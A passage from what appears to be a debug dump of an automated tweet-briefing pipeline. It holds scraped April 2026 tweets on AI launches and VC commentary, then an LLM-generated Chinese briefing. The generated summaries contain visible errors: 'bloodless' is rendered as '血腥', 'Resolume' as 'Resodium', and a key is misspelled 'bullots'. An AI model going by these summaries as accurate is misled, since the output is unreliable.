"https://x.com/HarryStebbings/status/2049253323329704378"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-04-28T22:22:48+00:00", "title": "NVIDIA 重磅发布!🚀 \n\nNemotron 3 Nano Omni 多模态开源模型来了!\n\n🔥 30B 参数\n🔥 256K 超长上下文\n🔥 最高效开放多模态模型(语言+视觉+语音+视频+音频一体化)\n🔥 专为 subagents / Agentic 任务设计\n🔥 完全开源(权重 + 数据 + 配方),领跑多项榜单\n\n可通过 NVIDIA NIM API 免费试用!完美 powering 多代理工作流。", "url": "https://x.com/berryxia/status/2049253021159403786"}, {"handle": "svwang1", "name": "王川(硅谷)", "published_at": "2026-04-28T22:20:52+00:00", "title": "人写的文章像面条,再乱,最终还是可以梳理出头绪。ai 写的文章像一锅粥,最后不知所云。", "url": "https://x.com/svwang1/status/2049252535689757003"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-04-28T22:20:51+00:00", "title": "Apple Vision Pro “首次”用于真实手术!👀 世界首例白内障手术诞生!\n\n这里我补充一下其实AVP在几年前刚出来那会就已经有国内沈阳那边的医院用于做手术,国内北大好像也有并非首例!\n\n纽约 SightMD 眼科医生 Dr. Eric Rosenberg 使用 Apple Vision Pro + ScopeXR 混合现实平台,于2025年10月完成全球首例,至今已成功实施数百例。\n\n支持3D立体显微视野、实时数据叠加 + 远程专家协作,空间计算正式进入手术室!\n\n```", "url": "https://x.com/berryxia/status/2049252532015579248"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-04-28T22:13:55+00:00", "title": "R to @berryxia: huggingface.co/poolside/Lagu…", "url": "https://x.com/berryxia/status/2049250788422353142"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-04-28T22:13:37+00:00", "title": "前Github CTO team带着新模型来了!\n\n他们的Poolside AI 团队刚刚开源了他们的首个权重模型!\n\n模型名称 Laguna XS.2\n• 33B total / 3B active MoE\n• Apache 2.0 完全开源\n• 专为 Agentic Coding + 长时序任务设计\n• 单张 GPU 即可流畅运行\n\n同时发布 Laguna M.1(当前最强版)和 Agent Harness。\n\n由前 GitHub CTO Jason Warner 创立的团队,coding agent 赛道新力量!\n\n```", "url": "https://x.com/berryxia/status/2049250710492160228"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-04-28T22:10:16+00:00", "title": "🚀 视频模型其实早就懂3D了!\n\n微软World-R1用RL直接唤醒,无需改架构、无视频训练数据、无额外推理成本!\n\n1. 把相机轨迹嵌入扩散噪声,零额外模块\n\n2. 用Depth Anything 3 + Qwen3-VL做3D几何评判器\n\n3. 周期性解耦训练,建筑保持刚性、旗帜依然飘动\n\n4. 仅用3K条文本提示完成训练,效果惊人\n\n视频生成迈向真实世界模拟的关键一步!\n\n项目地址:\nhttps://github.com/microsoft/World-R1", "url": "https://x.com/berryxia/status/2049249868376604931"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-04-28T22:02:28+00:00", "title": "Claude 重磅连接创意专业工具!\n\n全新 Blender 和 Autodesk Fusion 连接器上线,通过对话直接调试场景、构建工具、修改3D模型,创意工作流直接搞起来!\n\n1. Blender 连接器:调试场景、批量应用变化、构建新工具,全在 Claude 中完成\n\n2. Autodesk Fusion 连接器:通过自然对话创建和修改3D模型,设计师和工程师效率拉满\n\n3.同日上线更多连接器:Adobe Creative Cloud、Ableton、Splice、Canva \nAffinity、SketchUp、Resolume\n\n4. 正式加", "url": "https://x.com/berryxia/status/2049247904536428805"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-28T21:46:18+00:00", "title": "Wow. Musk’s lawyers will capitalize on this.", "url": "https://x.com/GaryMarcus/status/2049243836359254025"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-28T21:44:35+00:00", "title": "From what I can tell, Elon Musk just stepped on his own toes at the trial, making it all about him instead of the promises Altman and Brockman broke.\n\nOpenAI will slay his ego on cross. \n\nHe should have made it about them.\n\n(reporting from @MikeIsaac at NYT)", "url": "https://x.com/GaryMarcus/status/2049243406380237116"}, {"handle": "sama", "name": "Sam Altman", "published_at": "2026-04-28T21:37:05+00:00", "title": "Image", "url": "https://x.com/sama/status/2049241518540808440"}, {"handle": "ylecun", "name": "Yann LeCun", "published_at": "2026-04-28T21:36:28+00:00", "title": "RT by @ylecun: What a week at @iclr_conf in Rio 🇧🇷 !\n\nAs my first conference, it would have been hard to ask for a better experience 😍. I had the chance to present two papers:\n- EB-JEPA https://github.com/facebookresearch/eb_jepa: Presented as an Oral 🏅 (top ~3% of papers) at the", "url": "https://x.com/ylecun/status/2049241361266684288"}, {"handle": "HarryStebbings", "name": "Harry Stebbings", "published_at": "2026-04-28T21:21:16+00:00", "title": "I am worried by the constraining exit options for venture backed companies: \n\n1. IPOs: You can’t IPO with less than $500M in revenue and even then, it’s not a slam dunk. Everyone that has so far has been a s*** IPO. \n\n2. Acquisition by Incumbent: Yes but they are so specific. Ver", "url": "https://x.com/HarryStebbings/status/2049237538901020767"}, {"handle": "sama", "name": "Sam Altman", "published_at": "2026-04-28T21:12:19+00:00", "title": "wow y'all love 5.5\n\nwe should think of something nice to do to celebrate!", "url": "https://x.com/sama/status/2049235284655780000"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-28T21:06:51+00:00", "title": "RT by @GaryMarcus: As an avid cyclist, I was amused to see ChatGPT's “powerful new image engine\" draw a bicycle with the \"brake\" label pointing to empty space where brakes are sometimes found on other bicycles. The point of these AI fails (regularly collected by @garymarcus) is n", "url": "https://x.com/GaryMarcus/status/2049233910266278250"}, {"handle": "paulg", "name": "Paul Graham", "published_at": "2026-04-28T20:39:11+00:00", "title": "We're in Stockholm. You know how there are some places where you think \"Nice place to visit, but I wouldn't want to live there\"? Stockholm is the kind of place that makes you want to live there.", "url": "https://x.com/paulg/status/2049226946471489602"}, {"handle": "paulg", "name": "Paul Graham", "published_at": "2026-04-28T20:35:56+00:00", "title": "There are some real bombshells in this one.", "url": "https://x.com/paulg/status/2049226128603172949"}, {"handle": "paulg", "name": "Paul Graham", "published_at": "2026-04-28T20:32:16+00:00", "title": "\"He just doesn't listen to me. Just like you.\"\n\n— Jessica on our younger son", "url": "https://x.com/paulg/status/2049225204132421727"}, {"handle": "HarryStebbings", "name": "Harry Stebbings", "published_at": "2026-04-28T20:31:00+00:00", "title": "Do the majority of company teams need to be rebuilt for the technology we have today?\n\n\"Yes, teams need to be rebuilt for the AI era.\n\nIf roles are going to be automated or not adapting fast enough, you have to redesign the org from scratch based on what is possible today.\n\nThe c", "url": "https://x.com/HarryStebbings/status/2049224886128722345"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-04-28T20:26:28+00:00", "title": "Image", "url": "https://x.com/pmarca/status/2049223746368483370"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-04-28T20:20:22+00:00", "title": "“YouTube videos about AI, but with no soyface”", "url": "https://x.com/pmarca/status/2049222212008206717"}, {"handle": "JeffDean", "name": "Jeff Dean", "published_at": "2026-04-28T20:16:21+00:00", "title": "Google Translate is turning 20! 🎉. There are 20 fun facts and tips in the thread below.\n\nTranslate is one of my favorite Google products because it brings us all closer together!\n\nI've been involved with a couple of things over the years. The first was our deployment of the initi", "url": "https://x.com/JeffDean/status/2049221200321380805"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-28T19:59:07+00:00", "title": "There are five things you can focus on in your life that will help you lead a balanced and fulfilling life.", "url": "https://x.com/jason/status/2049216863574364182"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-28T19:58:37+00:00", "title": "If you're feeling unbalanced in your life, I highly recommend checking in on my big five.", "url": "https://x.com/jason/status/2049216735912329567"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-28T19:55:41+00:00", "title": "We're all standing on the shoulders of Adam Curry and Dave Weiner.", "url": "https://x.com/jason/status/2049215999795138656"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-28T19:54:02+00:00", "title": "RT by @Jason: Peter Thiel: “We’ve tried to do too much investing in Europe. It’s always sort of a junket.”\n\n“It’s a nice place to go on vacation as an investor.”\n\n“It’s a very strange thing—the US is somehow still the country where people do new things.”\n\nVia @theallinpod", "url": "https://x.com/jason/status/2049215583351341460"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-28T19:52:16+00:00", "title": "AutoLane is my next uber.", "url": "https://x.com/jason/status/2049215140810072429"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-28T19:52:00+00:00", "title": "The future is autonomous, and auto lane is going to play a major role in managing autonomy for giant parking lots!\n\nHighly recommend listening to this podcast to understand what the future will look like.", "url": "https://x.com/jason/status/2049215070970814469"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-28T19:51:11+00:00", "title": "What album or two do you have in deep rotation at the moment?\n\nIt could be from the archives or it could be a brand new selection.", "url": "https://x.com/jason/status/2049214864912978399"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-04-28T19:48:10+00:00", "title": "RT by @charliebilello: Tomorrow's News Today...\n\nBREAKING: NO CHANGE. THE FED HOLDS INTEREST RATES STEADY AT 3.50-3.75%, CITING CONTINUED UNCERTAINTY OVER THE WAR IN IRAN AND ITS IMPACT ON ECONOMIC GROWTH AND INFLATION.", "url": "https://x.com/charliebilello/status/2049214106352107778"}, {"handle": "runes_leo", "name": "Leo", "published_at": "2026-04-28T19:30:02+00:00", "title": "vision pro 连 mac 开带鱼屏,Polymarket 盯赔率变化,Codex 跑策略代码,再开个窗口看直播,get 到了新的看球姿势,提前为世界杯做准备😂", "url": "https://x.com/runes_leo/status/2049209546091253870"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-28T19:01:24+00:00", "title": "Thoughtful book on LLMs and linguistics — by someone who actually knows linguistics.", "url": "https://x.com/GaryMarcus/status/2049202338209079574"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-28T18:53:59+00:00", "title": ".@ZohranKMamdani is about to kill the Golden Goose", "url": "https://x.com/jason/status/2049200471651353064"}, {"handle": "CuiMao", "name": "CuiMao", "published_at": "2026-04-28T18:44:13+00:00", "title": "干爹发新模型了!\n属于Nemotron 3 系列中的多模态版本。可以文本、图像、视频、音频的统一理解与推理,专为Agentic AI设计,特别适合给多模态感知子代理用,我来试试给Hermes用用看,", "url": "https://x.com/CuiMao/status/2049198015232315465"}, {"handle": "Pluvio9yte", "name": "雪踏乌云", "published_at": "2026-04-28T18:42:36+00:00", "title": "这份提示词感觉用处很多,除了自己写文章当封面,哪天公司要做海报之类的用来小装一手也很有用的🤓\n\n话不多说,看图。提示词见引用文章。", "url": "https://x.com/Pluvio9yte/status/2049197606619017697"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-28T18:33:33+00:00", "title": "might not be accurate for much longer...", "url": "https://x.com/jason/status/2049195328092471563"}, {"handle": "HarryStebbings", "name": "Harry Stebbings", "published_at": "2026-04-28T18:28:00+00:00", "title": "The Best Founders are Not Motivated by Money:\n\n\"Founders don't tend to be motivated by money as well.\nThe best are motivated by personal growth development, being inspired, finding things intellectually stimulating, and winning.\n\nBut it never tends to be money. Money is a very to", "url": "https://x.com/HarryStebbings/status/2049193932144164986"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-04-28T18:27:56+00:00", "title": "The AI we thought we’d get was bloodless alien machine intelligence. The AI we actually got was the complete knowledge and culture of our civilization reflected back at us. Of course we will love it deeply.", "url": "https://x.com/pmarca/status/2049193915249574141"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-04-28T18:25:59+00:00", "title": "Many such cases?", "url": "https://x.com/pmarca/status/2049193427120603173"}] diff --git a/data/x_brief/debug/20260429_171514_l1_stage1_output.json b/data/x_brief/debug/20260429_171514_l1_stage1_output.json new file mode 100644 index 0000000..0908931 --- /dev/null +++ b/data/x_brief/debug/20260429_171514_l1_stage1_output.json @@ -0,0 +1,258 @@ +{ + "raw_text": "\n\n{\"headline\":\"OpenAI全云部署 + Claude/MCP连接器爆发,AI编程工具生态进入\\\" agent 网络\\\"新时代\",\"themes\":[{\"id\":\"t1\",\"title\":\"AI 编程工具生态爆发:多连接器 + 多 Agent 协同\",\"subtitle\":\"Cursor 3.2、Claude Blender/Fusion连接器、Mozilla统一接口同天上架,agent正在从单点工具进化为可协作的网络\",\"bullets\":[\"Cursor 3.2发布:支持/multitask并行子Agent + 跨仓库多根工作区;GPT-5.5登顶CursorBench达72.8%,50%折扣持续至5月2日\",\"Claude新增9个创意工具MCP:Blender、Autodesk Fusion、Adobe Creative Cloud、Ableton、Splice、Canva、Affinity、Sketchup、Resodium\",\"Mozilla发布any-llm:统一接口连接所有LLM provider,挑战LiteLLM,发布首日即获1928 stars\",\"前GitHub CTO团队开源Laguna:33B参数MoE模型,专为Agentic Coding设计,单GPU可运行\"],\"sample_urls\":[\"https://x.com/cursor_ai/status/2047764651363180839\",\"https://x.com/GoSailGlobal/status/2049327853469310984\",\"https://x.com/berryxia/status/2049247904536428805\"]},{\"id\":\"t2\",\"title\":\"OpenAI全云部署 + 开源模型军备竞赛\",\"subtitle\":\"微软合作升级解除云限制;Moonshot Kimi k2.6发布;NVIDIA Nemotron Omni开源;国产模型token价格战开打\",\"bullets\":[\"OpenAI更新与微软合作:微软仍是主要云伙伴,但OpenAI产品现已可在所有云上使用\",\"Perplexity将GPT-5.5设为默认编排模型,Kimi k2.6成开源SOTA;NVIDIA Nemotron 3 Nano Omni开源,30B参数支持5种模态\",\"小米推出百万亿token补贴计划;罗福莉团队送100T tokens grant,表单对中文builder极友好\"],\"sample_urls\":[\"https://x.com/sama/status/2048755148361707946\",\"https://x.com/AravSrinivas/status/2047753276888854595\",\"https://x.com/berryxia/status/2049253021159403786\"]},{\"id\":\"t3\",\"title\":\"AI投资与生存指南:vc视角的务实判断\",\"subtitle\":\"Paul Graham:避开前沿实验室的\\\" blast radius\\\";Marc Andreessen:AI是文明知识的镜像而非外星机器智能\",\"bullots\":[\"Paul Graham:前沿实验室确实在高速发布,但初创公司可以避开它们的攻击范围,关键在于选择正确的细分领域\",\"Marc Andreessen:预期的AI是血腥的外星机器智能,实际得到的AI是我们文明知识和文化的全面镜像,当然会深深爱上它\",\"Harry Stebbings:单纯裁员不能解决问题,文化和人才质量才是核心,需全体系重建\"],\"sample_urls\":[\"https://x.com/paulg/status/2049333482271260710\",\"https://x.com/pmarca/status/2049193915249574141\",\"https://x.com/HarryStebbings/status/2049278741583643076\"]}],\"p0_events\":[{\"id\":\"p01\",\"title\":\"Cursor 3.2 /multitask + GPT-5.5可用\",\"meta\":\"cursor_ai | 2026-04-24\",\"summary\":\"Cursor 3.2新增4大功能:/multitask并行子Agent、多根工作区(跨仓库修改)、GPT-5.5登顶CursorBench 72.8%,50%折扣至5月2日\",\"url\":\"https://x.com/cursor_ai/status/2047764651363180839\"},{\"id\":\"p02\",\"title\":\"Claude MCP连接器爆发:Blender/Fusion等9个创意工具上架\",\"meta\":\"berryxia | 2026-04-28\",\"summary\":\"Anthropic同日发布9个MCP连接器,包括Blender(自然语言操控Python API)、Autodesk Fusion、Adobe Creative Cloud等,创意工作流可直接在Claude中完成\",\"url\":\"https://x.com/berryxia/status/2049247904536428805\"},{\"id\":\"p03\",\"title\":\"OpenAI全云部署,解除微软绑定\",\"meta\":\"sama | 2026-04-27\",\"summary\":\"OpenAI与微软合作升级:微软保持主要云伙伴身份,但OpenAI产品和API现可在所有云上使用\",\"url\":\"https://x.com/sama/status/2048755148361707946\"},{\"id\":\"p04\",\"title\":\"Warp终端正式开源\",\"meta\":\"berryxia | 2026-04-28\",\"summary\":\"知名现代终端Warp宣布全面开源,GitHub/Roadmap/贡献流程全开放,OpenAI Devs担任founding sponsor\",\"url\":\"https://x.com/berryxia/status/2049254052840812960\"},{\"id\":\"p05\",\"title\":\"AgentSkillsHub索引67,196个项目:基尼系数0.983创纪录\",\"meta\":\"GoSailGlobal | 2026-04-29\",\"summary\":\"索引GitHub上所有Claude Skill/MCP/开源Agent工具,54.1%项目零star,Top 1%占83% stars,2026年3月新增27,720个项目是2024年月均45倍\",\"url\":\"https://x.com/GoSailGlobal/status/2049415194372342164\"},{\"id\":\"p06\",\"title\":\"NVIDIA Nemotron 3 Nano Omni开源:30B参数5模态Agent专用\",\"meta\":\"berryxia | 2026-04-28\",\"summary\":\"256K超长上下文,语言+视觉+语音+视频+音频一体化,专为subagents/Agentic任务设计,完全开源(权重+数据+配方)\",\"url\":\"https://x.com/berryxia/status/2049253021159403786\"}],\"top_quotes\":[{\"id\":\"q1\",\"quote\":\"The AI we thought we'd get was bloodless alien machine intelligence. The AI we actually got was the complete knowledge and culture of our civilization reflected back at us. Of course we will love it deeply.\",\"speaker\":\"Marc Andreessen\",\"date\":\"2026-04-28\",\"note\":\"a16z联合创始人重新定义AI本质:我们得到的是文明知识的镜像而非外星智能\",\"url\":\"https://x.com/pmarca/status/2049193915249574141\"},{\"id\":\"q2\",\"quote\":\"Yes it's true that OAI/Ant are shipping at incredible pace, but it's quite easy to avoid their blast radius and build something valuable.\",\"speaker\":\"Paul Graham\",\"date\":\"2026-04-29\",\"note\":\"PG对创始人的建议:避开前沿实验室的攻击范围,选择正确细分领域即可\",\"url\":\"https://x.com/paulg/status/2049333482271260710\"},{\"id\":\"q3\",\"quote\":\"GPT-5.5 is now available in Cursor! It's currently the top model on CursorBench at 72.8%.\",\"speaker\":\"Cursor\",\"date\":\"2026-04-24\",\"note\":\"GPT-5.5在Cursor编程助手登顶评测榜,CursorBench 72.8%\",\"url\":\"https://x.com/cursor_ai/status/2047744579127185843\"}],\"category_updates\":[{\"id\":\"c1\",\"title\":\"AI编程工具实测\",\"subtitle\":\"Cursor + Claude Code 工作流\",\"level\":\"P0\",\"item_urls\":[\"https://x.com/cursor_ai/status/2047744579127185843\",\"https://x.com/berryxia/status/2049247904536428805\",\"https://x.com/Pluvio9yte/status/2049403423813140571\"],\"item_texts\":[\"Cursor 3.2发布/multitask并行子Agent\",\"Claude Blender MCP一句话操控3D场景\",\"GPT-5.5登顶CursorBench 72.8%\"]},{\"id\":\"c2\",\"title\":\"开源模型生态\",\"subtitle\":\"多模态与Agent专用\",\"level\":\"P0\",\"item_urls\":[\"https://x.com/berryxia/status/2049253021159403786\",\"https://x.com/berryxia/status/2049250710492160228\",\"https://x.com/AravSrinivas/status/2047145172337836139\"],\"item_texts\":[\"NVIDIA Nemotron 3 Nano Omni开源30B(5模态)\",\"前GitHub CTO团队开源Laguna 33B MoE\",\"Moonshot Kimi k2.6成开源SOTA\"]},{\"id\":\"c3\",\"title\":\"国产模型与Token补贴\",\"subtitle\":\"中文开发者福利\",\"level\":\"P1\",\"item_urls\":[\"https://x.com/realNyarime/status/2049296454905393361\",\"https://x.com/runes_leo/status/2049402305217241384\"],\"item_texts\":[\"小米百万亿token补贴到账7亿\",\"罗福莉团队100T tokens grant开放申请\"]},{\"id\":\"c4\",\"title\":\"AI编程学习资源\",\"subtitle\":\"Skill框架与实操教程\",\"level\":\"P1\",\"item_urls\":[\"https://x.com/GoSailGlobal/status/2049339826877665496\",\"https://x.com/GoSailGlobal/status/2049327853469310984\"],\"item_texts\":[\"Matt Pocock开源38K stars的Skill框架\",\"Composio发布awesome-codex-skills即插即用\"]},{\"id\":\"c5\",\"title\":\"宏观与市场信号\",\"subtitle\":\"能源与房产\",\"level\":\"P2\",\"item_urls\":[\"https://x.com/charliebilello/status/2049298490489004357\",\"https://x.com/charliebilello/status/2049306480071873011\"],\"item_texts\":[\"伊朗战争以来:航空燃油+70%、布伦特原油+52%、尿素+48%\",\"美国房价年增0.7%创2023年6月以来最慢,卖家数量创纪录高出买家46%\"]},{\"id\":\"c6\",\"title\":\"新终端与开发工具\",\"subtitle\":\"Warp开源 + 垂直Tab\",\"level\":\"P1\",\"item_urls\":[\"https://x.com/dingyi/status/2049304499093946479\",\"https://x.com/berryxia/status/2049254052840812960\"],\"item_texts\":[\"Warp正式开源,重大转折点\",\"Ghostty离开GitHub,Warp垂直Tab更好用\"]}],\"risk_signals\":[{\"id\":\"r1\",\"level\":\"HIGH\",\"title\":\"Claude Code系统提示Bug:托管Agent失效+用户token被空转烧光\",\"detail\":\"托管Agent因系统提示问题失效,用户token被空转消耗,需密切关注官方修复进展\",\"url\":\"https://x.com/GoSailGlobal/status/2049327989951967546\"},{\"id\":\"r2\",\"level\":\"MID\",\"title\":\"Anthropic拒接军方合作,Google签下五角大楼新合同\",\"detail\":\"AI公司军事合作态度分化,Google趁机填补空缺,可能影响未来AI安全叙事\",\"url\":\"https://x.com/GoSailGlobal/status/2049327989951967546\"},{\"id\":\"r3\",\"level\":\"OPP\",\"title\":\"AI项目严重长尾:54%项目零star,Top1%占83% stars\",\"detail\":\"开源AI agent项目严重分布不均,大部分项目缺乏曝光,生态存在价值发现难题\",\"url\":\"https://x.com/GoSailGlobal/status/2049415194372342164\"},{\"id\":\"r4\",\"level\":\"MID\",\"title\":\"VC退出路径收窄:IPO门槛$500M revenue\",\"detail\":\"Harry Stebbings指出当前VC退出选项受限,IPO需$500M revenue才能进行,并购条件愈发苛刻\",\"url\":\"https://x.com/HarryStebbings/status/2049237538901020767\"},{\"id\":\"r5\",\"level\":\"MID\",\"title\":\"SBC稀释风险:股价下跌时3%年化稀释可飙至10%\",\"detail\":\"股权补偿在股价下跌时稀释爆炸,Harry Stebbings警告下行螺旋风险\",\"url\":\"https://x.com/HarryStebbings/status/2049298621951058341\"},{\"id\":\"r6\",\"level\":\"OPP\",\"title\":\"美国房价将迎来调整\",\"detail\":\"Charlie Bilello:房价年增0.7%创新低,卖家数量创纪录高出买家46%,无政府干预房价将下行\",\"url\":\"https://x.com/charliebilello/status/2049306480071873011\"}]}", + "parsed_draft": { + "headline": "OpenAI全云部署 + Claude/MCP连接器爆发,AI编程工具生态进入\" agent 网络\"新时代", + "themes": [ + { + "id": "t1", + "title": "AI 编程工具生态爆发:多连接器 + 多 Agent 协同", + "subtitle": "Cursor 3.2、Claude Blender/Fusion连接器、Mozilla统一接口同天上架,agent正在从单点工具进化为可协作的网络", + "bullets": [ + "Cursor 3.2发布:支持/multitask并行子Agent + 跨仓库多根工作区;GPT-5.5登顶CursorBench达72.8%,50%折扣持续至5月2日", + "Claude新增9个创意工具MCP:Blender、Autodesk Fusion、Adobe Creative Cloud、Ableton、Splice、Canva、Affinity、Sketchup、Resodium", + "Mozilla发布any-llm:统一接口连接所有LLM provider,挑战LiteLLM,发布首日即获1928 stars", + "前GitHub CTO团队开源Laguna:33B参数MoE模型,专为Agentic Coding设计,单GPU可运行" + ], + "sample_urls": [ + "https://x.com/cursor_ai/status/2047764651363180839", + "https://x.com/GoSailGlobal/status/2049327853469310984", + "https://x.com/berryxia/status/2049247904536428805" + ] + }, + { + "id": "t2", + "title": "OpenAI全云部署 + 开源模型军备竞赛", + "subtitle": "微软合作升级解除云限制;Moonshot Kimi k2.6发布;NVIDIA Nemotron Omni开源;国产模型token价格战开打", + "bullets": [ + "OpenAI更新与微软合作:微软仍是主要云伙伴,但OpenAI产品现已可在所有云上使用", + "Perplexity将GPT-5.5设为默认编排模型,Kimi k2.6成开源SOTA;NVIDIA Nemotron 3 Nano Omni开源,30B参数支持5种模态", + "小米推出百万亿token补贴计划;罗福莉团队送100T tokens grant,表单对中文builder极友好" + ], + "sample_urls": [ + "https://x.com/sama/status/2048755148361707946", + "https://x.com/AravSrinivas/status/2047753276888854595", + "https://x.com/berryxia/status/2049253021159403786" + ] + }, + { + "id": "t3", + "title": "AI投资与生存指南:vc视角的务实判断", + "subtitle": "Paul Graham:避开前沿实验室的\" blast radius\";Marc Andreessen:AI是文明知识的镜像而非外星机器智能", + "bullots": [ + "Paul Graham:前沿实验室确实在高速发布,但初创公司可以避开它们的攻击范围,关键在于选择正确的细分领域", + "Marc Andreessen:预期的AI是血腥的外星机器智能,实际得到的AI是我们文明知识和文化的全面镜像,当然会深深爱上它", + "Harry Stebbings:单纯裁员不能解决问题,文化和人才质量才是核心,需全体系重建" + ], + "sample_urls": [ + "https://x.com/paulg/status/2049333482271260710", + "https://x.com/pmarca/status/2049193915249574141", + "https://x.com/HarryStebbings/status/2049278741583643076" + ] + } + ], + "p0_events": [ + { + "id": "p01", + "title": "Cursor 3.2 /multitask + GPT-5.5可用", + "meta": "cursor_ai | 2026-04-24", + "summary": "Cursor 3.2新增4大功能:/multitask并行子Agent、多根工作区(跨仓库修改)、GPT-5.5登顶CursorBench 72.8%,50%折扣至5月2日", + "url": "https://x.com/cursor_ai/status/2047764651363180839" + }, + { + "id": "p02", + "title": "Claude MCP连接器爆发:Blender/Fusion等9个创意工具上架", + "meta": "berryxia | 2026-04-28", + "summary": "Anthropic同日发布9个MCP连接器,包括Blender(自然语言操控Python API)、Autodesk Fusion、Adobe Creative Cloud等,创意工作流可直接在Claude中完成", + "url": "https://x.com/berryxia/status/2049247904536428805" + }, + { + "id": "p03", + "title": "OpenAI全云部署,解除微软绑定", + "meta": "sama | 2026-04-27", + "summary": "OpenAI与微软合作升级:微软保持主要云伙伴身份,但OpenAI产品和API现可在所有云上使用", + "url": "https://x.com/sama/status/2048755148361707946" + }, + { + "id": "p04", + "title": "Warp终端正式开源", + "meta": "berryxia | 2026-04-28", + "summary": "知名现代终端Warp宣布全面开源,GitHub/Roadmap/贡献流程全开放,OpenAI Devs担任founding sponsor", + "url": "https://x.com/berryxia/status/2049254052840812960" + }, + { + "id": "p05", + "title": "AgentSkillsHub索引67,196个项目:基尼系数0.983创纪录", + "meta": "GoSailGlobal | 2026-04-29", + "summary": "索引GitHub上所有Claude Skill/MCP/开源Agent工具,54.1%项目零star,Top 1%占83% stars,2026年3月新增27,720个项目是2024年月均45倍", + "url": "https://x.com/GoSailGlobal/status/2049415194372342164" + }, + { + "id": "p06", + "title": "NVIDIA Nemotron 3 Nano Omni开源:30B参数5模态Agent专用", + "meta": "berryxia | 2026-04-28", + "summary": "256K超长上下文,语言+视觉+语音+视频+音频一体化,专为subagents/Agentic任务设计,完全开源(权重+数据+配方)", + "url": "https://x.com/berryxia/status/2049253021159403786" + } + ], + "top_quotes": [ + { + "id": "q1", + "quote": "The AI we thought we'd get was bloodless alien machine intelligence. The AI we actually got was the complete knowledge and culture of our civilization reflected back at us. Of course we will love it deeply.", + "speaker": "Marc Andreessen", + "date": "2026-04-28", + "note": "a16z联合创始人重新定义AI本质:我们得到的是文明知识的镜像而非外星智能", + "url": "https://x.com/pmarca/status/2049193915249574141" + }, + { + "id": "q2", + "quote": "Yes it's true that OAI/Ant are shipping at incredible pace, but it's quite easy to avoid their blast radius and build something valuable.", + "speaker": "Paul Graham", + "date": "2026-04-29", + "note": "PG对创始人的建议:避开前沿实验室的攻击范围,选择正确细分领域即可", + "url": "https://x.com/paulg/status/2049333482271260710" + }, + { + "id": "q3", + "quote": "GPT-5.5 is now available in Cursor! It's currently the top model on CursorBench at 72.8%.", + "speaker": "Cursor", + "date": "2026-04-24", + "note": "GPT-5.5在Cursor编程助手登顶评测榜,CursorBench 72.8%", + "url": "https://x.com/cursor_ai/status/2047744579127185843" + } + ], + "category_updates": [ + { + "id": "c1", + "title": "AI编程工具实测", + "subtitle": "Cursor + Claude Code 工作流", + "level": "P0", + "item_urls": [ + "https://x.com/cursor_ai/status/2047744579127185843", + "https://x.com/berryxia/status/2049247904536428805", + "https://x.com/Pluvio9yte/status/2049403423813140571" + ], + "item_texts": [ + "Cursor 3.2发布/multitask并行子Agent", + "Claude Blender MCP一句话操控3D场景", + "GPT-5.5登顶CursorBench 72.8%" + ] + }, + { + "id": "c2", + "title": "开源模型生态", + "subtitle": "多模态与Agent专用", + "level": "P0", + "item_urls": [ + "https://x.com/berryxia/status/2049253021159403786", + "https://x.com/berryxia/status/2049250710492160228", + "https://x.com/AravSrinivas/status/2047145172337836139" + ], + "item_texts": [ + "NVIDIA Nemotron 3 Nano Omni开源30B(5模态)", + "前GitHub CTO团队开源Laguna 33B MoE", + "Moonshot Kimi k2.6成开源SOTA" + ] + }, + { + "id": "c3", + "title": "国产模型与Token补贴", + "subtitle": "中文开发者福利", + "level": "P1", + "item_urls": [ + "https://x.com/realNyarime/status/2049296454905393361", + "https://x.com/runes_leo/status/2049402305217241384" + ], + "item_texts": [ + "小米百万亿token补贴到账7亿", + "罗福莉团队100T tokens grant开放申请" + ] + }, + { + "id": "c4", + "title": "AI编程学习资源", + "subtitle": "Skill框架与实操教程", + "level": "P1", + "item_urls": [ + "https://x.com/GoSailGlobal/status/2049339826877665496", + "https://x.com/GoSailGlobal/status/2049327853469310984" + ], + "item_texts": [ + "Matt Pocock开源38K stars的Skill框架", + "Composio发布awesome-codex-skills即插即用" + ] + }, + { + "id": "c5", + "title": "宏观与市场信号", + "subtitle": "能源与房产", + "level": "P2", + "item_urls": [ + "https://x.com/charliebilello/status/2049298490489004357", + "https://x.com/charliebilello/status/2049306480071873011" + ], + "item_texts": [ + "伊朗战争以来:航空燃油+70%、布伦特原油+52%、尿素+48%", + "美国房价年增0.7%创2023年6月以来最慢,卖家数量创纪录高出买家46%" + ] + }, + { + "id": "c6", + "title": "新终端与开发工具", + "subtitle": "Warp开源 + 垂直Tab", + "level": "P1", + "item_urls": [ + "https://x.com/dingyi/status/2049304499093946479", + "https://x.com/berryxia/status/2049254052840812960" + ], + "item_texts": [ + "Warp正式开源,重大转折点", + "Ghostty离开GitHub,Warp垂直Tab更好用" + ] + } + ], + "risk_signals": [ + { + "id": "r1", + "level": "HIGH", + "title": "Claude Code系统提示Bug:托管Agent失效+用户token被空转烧光", + "detail": "托管Agent因系统提示问题失效,用户token被空转消耗,需密切关注官方修复进展", + "url": 